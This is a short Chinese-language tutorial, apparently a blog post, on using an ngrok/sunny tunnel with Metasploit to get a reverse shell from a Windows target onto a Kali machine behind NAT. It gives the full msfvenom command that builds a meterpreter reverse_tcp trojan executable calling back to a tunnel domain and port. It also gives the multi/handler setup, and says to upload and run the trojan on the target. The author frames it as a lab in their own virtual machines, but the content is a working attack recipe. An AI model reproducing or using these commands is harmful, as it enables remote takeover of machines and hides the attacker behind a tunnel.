1、在ngrok注册账号,并且开通免费隧道(点击下载)
这里我kali的内网ip地址是10.10.10.131
2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html)
解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件
3、启动sunny
./sunny clientid 隧道id
如上图说明启动成功
4、目标机 ip地址192.168.43.170(win2003) kali 10.10.10.131(这里是我通过虚拟机配置的内外网环境)
即目标机无法ping通kali kali可以ping通目标机 即kali处于内网 验证如下图
5、kali端配置木马
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10326 -f exe -o /root/Desktop/puty.exe (生成木马)
LHOST 为赠送的域名
LPORT 为远程端口号
6、启动msf配置Exploit模块
Use exploit/multi/handler
7、选择攻击载荷
Set payload windows/meterpreter/reverse_tcp
执行run 或许exploit
注意这里的ip地址和端口号,不要和前面的搞混了
上传之前生成的木马并且执行
已经成功将shell反弹到我们的内网kali
第二种内网穿透方式,也是我平时用的比较多的一种见连接
https://blog.csdn.net/u010025272/article/details/127101003